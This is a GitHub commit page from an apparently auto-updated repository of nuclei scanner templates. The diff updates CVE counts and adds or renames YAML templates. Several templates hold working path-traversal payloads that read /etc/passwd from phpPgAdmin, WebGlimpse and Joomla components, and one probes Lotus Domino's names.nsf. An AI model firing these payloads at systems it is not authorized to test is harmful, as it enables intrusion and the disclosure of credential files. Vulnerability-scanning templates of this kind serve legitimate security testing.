Skip to content

Commit

Permalink
Auto Updated
Browse files Browse the repository at this point in the history
  • Loading branch information
test committed Sep 9, 2024
1 parent d71bf7c commit 55d4582
Show file tree
Hide file tree
Showing 3,589 changed files with 59,275 additions and 115,751 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
30 changes: 15 additions & 15 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -20,25 +20,25 @@
| CVE-2016 | 249 |
| CVE-2017 | 396 |
| CVE-2018 | 446 |
| CVE-2019 | 513 |
| CVE-2019 | 512 |
| CVE-2020 | 592 |
| CVE-2021 | 1732 |
| CVE-2022 | 2467 |
| CVE-2023 | 4759 |
| CVE-2024 | 4970 |
| CVE-2021 | 1731 |
| CVE-2022 | 2468 |
| CVE-2023 | 4758 |
| CVE-2024 | 4974 |
| Other | 23950 |
## 近几天数量变化情况
|2024-09-02 | 2024-09-03 | 2024-09-04 | 2024-09-05 | 2024-09-06 | 2024-09-07 | 2024-09-08|
|2024-09-03 | 2024-09-04 | 2024-09-05 | 2024-09-06 | 2024-09-07 | 2024-09-08 | 2024-09-09|
|--- | ------ | ------ | ------ | ------ | ------ | ---|
|41584 | 41586 | 41592 | 41615 | 41725 | 41788 | 41796|
|41586 | 41592 | 41615 | 41725 | 41788 | 41796 | 41798|
## 最近新增文件
| templates name |
| --- |
| CVE-2024-8538.yaml |
| CVE-2024-7112.yaml |
| CVE-2024-6849.yaml |
| CVE-2024-6010.yaml |
| CVE-2024-7620.yaml |
| CVE-2024-1596.yaml |
| apache-hertzbeat-default-login.yaml |
| preloader-plus.yaml |
| CVE-2024-6846.yaml |
| CVE-2024-38472.yaml |
| CVE-2024-45388.yaml |
| CVE-2024-7786.yaml |
| 2475241188.yaml |
| cmdi-blind-oast-polyglot.yaml |
| wp-cms-detect.yaml |
| achecker-detect.yaml |
3 changes: 2 additions & 1 deletion data.json
Original file line number Diff line number Diff line change
Expand Up @@ -183,5 +183,6 @@
"2024-09-05": 41615,
"2024-09-06": 41725,
"2024-09-07": 41788,
"2024-09-08": 41796
"2024-09-08": 41796,
"2024-09-09": 41798
}
10 changes: 9 additions & 1 deletion data1.json
Original file line number Diff line number Diff line change
Expand Up @@ -49454,5 +49454,13 @@
"CVE-2024-7620.yaml": "2024-09-08 02:25:53",
"CVE-2024-1596.yaml": "2024-09-08 02:25:53",
"apache-hertzbeat-default-login.yaml": "2024-09-08 02:25:53",
"preloader-plus.yaml": "2024-09-08 02:25:53"
"preloader-plus.yaml": "2024-09-08 02:25:53",
"CVE-2024-6846.yaml": "2024-09-09 02:24:07",
"CVE-2024-38472.yaml": "2024-09-09 02:24:07",
"CVE-2024-45388.yaml": "2024-09-09 02:24:07",
"CVE-2024-7786.yaml": "2024-09-09 02:24:07",
"2475241188.yaml": "2024-09-09 02:24:07",
"cmdi-blind-oast-polyglot.yaml": "2024-09-09 02:24:07",
"wp-cms-detect.yaml": "2024-09-09 02:24:07",
"achecker-detect.yaml": "2024-09-09 02:24:07"
}
33 changes: 33 additions & 0 deletions nuclei-templates/CVE-2005/CVE-2005-2428.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,33 @@
id: CVE-2005-2428
info:
name: Lotus Domino R5 and R6 WebMail Default Configuration Information Disclosure
author: CasperGN
severity: medium
tags: cve,cve2005,domino
description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
reference:
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
- https://www.exploit-db.com/exploits/39495
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2005-2428
cwe-id: CWE-200

requests:
- method: GET
path:
- "{{BaseURL}}/names.nsf/People?OpenView"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
name: domino-username
regex:
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
part: body

# Enhanced by mp on 2022/02/02
25 changes: 0 additions & 25 deletions nuclei-templates/CVE-2005/cve-2005-2428.yaml

This file was deleted.

28 changes: 28 additions & 0 deletions nuclei-templates/CVE-2008/CVE-2008-5587.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
id: CVE-2008-5587
info:
name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion
author: dhiyaneshDK
severity: medium
description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/7363
- http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/
- http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014
- http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263
classification:
cve-id: CVE-2008-5587
metadata:
shodan-query: http.title:"phpPgAdmin"
tags: cve,cve2008,lfi,phppgadmin
requests:
- method: GET
path:
- '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
27 changes: 0 additions & 27 deletions nuclei-templates/CVE-2008/cve-2008-5587.yaml

This file was deleted.

31 changes: 0 additions & 31 deletions nuclei-templates/CVE-2009/CVE-2009-2015.yaml

This file was deleted.

13 changes: 5 additions & 8 deletions nuclei-templates/CVE-2009/CVE-2009-5114.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -4,27 +4,24 @@ info:
name: WebGlimpse 2.18.7 - Directory Traversal
author: daffainfo
severity: high
description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
reference:
- https://www.exploit-db.com/exploits/36994
- https://www.cvedetails.com/cve/CVE-2009-5114
- http://websecurity.com.ua/2628/
- https://exchange.xforce.ibmcloud.com/vulnerabilities/74321
remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2009-5114
tags: cve,cve2009,lfi

requests:
- method: GET
path:
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:.*:0:0:"
- "root:.*:0:0"

- type: status
status:
- 200
# Enhanced by mp on 2022/02/13
27 changes: 27 additions & 0 deletions nuclei-templates/CVE-2009/cve-2009-2015.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
id: CVE-2009-2015

info:
name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/8898
- https://www.cvedetails.com/cve/CVE-2009-2015
tags: cve,cve2009,joomla,lfi

requests:
- method: GET
path:
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:.*:0:0"

- type: status
status:
- 200
29 changes: 0 additions & 29 deletions nuclei-templates/CVE-2010/CVE-2010-1535.yaml

This file was deleted.

34 changes: 0 additions & 34 deletions nuclei-templates/CVE-2010/CVE-2010-1981.yaml

This file was deleted.

33 changes: 0 additions & 33 deletions nuclei-templates/CVE-2010/CVE-2010-4617.yaml

This file was deleted.

Loading

0 comments on commit 55d4582

Please sign in to comment.